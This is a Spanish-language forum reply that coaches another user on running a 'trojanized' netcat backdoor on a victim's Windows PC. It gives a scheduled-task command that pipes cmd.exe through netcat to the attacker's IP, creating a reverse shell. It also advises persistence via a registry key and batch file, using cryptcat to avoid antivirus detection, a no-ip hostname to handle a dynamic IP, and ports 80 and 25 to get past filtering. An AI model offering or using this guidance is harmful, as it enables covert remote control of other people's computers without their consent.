Hola arkad2008 la tecnica funciona el netcat algunos av lo agarran si queres podes probar tambien con el cryptcat es como el netcat pero es un poco mejor menos detectado y eso, pero para el caso es lo mismo.
Con respecto a la duda que tienes sobre si tenes que dejar a la escucha tu pc al momento que la pc victima ejecuta el netcat troyanizado, si tienes que tener tu pc a la escucha si no como tu dices no sirve ponerte a la escucha despues. Simplemente por que el netcat ya mando la "señal" para conectar pero tu pc no estaba y como ya fue ejecutado una vez no se vuelve a ejecutar o a pedir la "señal" de conectar a menos que el dueño de la pc lo ejecute aproposito cosa que no creo o que se le reinicie la pc xD
pero eso se resuelve facil como muestra en el tutorial con el programador de tareas de windows podes hacer que se ejecute a determinada hora de x dia.
at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""
para que funcione eso solamente lo agregas en tu batch entonces cuando se prenda la pc ejecuta el batch gracias a la llave que dejaste en el registro, al ejecutar el batch leera esa linea de codigo y programara automaticamente el programador de tareas de windows para que ejecute el netcat ese día a esa hora, acuerdate la fecha y dia que pones asi tienes tu pc lista a la escucha ya que saves que se va a ejecutar el netcat troyanizado.
Es recomedable que pongas que se ejecute los 30 dias del mes a una hora diamos 6:00 pm.
Por último tienes que tener encuenta si tu ip es dinamica o fija si es dinamica osea que cambias de ip cada vez que te conectas es recomendable que te hagas un no-ip si no cuando cambiaras tu ip el netcat troyanizado nunca se conectaria contigo y tene en cuenta que debes usar el puerto 80 o 25 que son los permitidos.
Si tienes más dudas o no me entiendes algo dime que con gusto las respondere.
Saludos
